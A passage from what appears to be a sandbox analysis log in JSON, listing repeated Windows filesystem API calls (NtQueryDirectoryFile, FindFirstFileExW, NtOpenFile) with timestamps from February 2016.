"filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,359", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,399", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,399", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,399", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,399", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,399", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,409", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,409", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,409", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,409", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 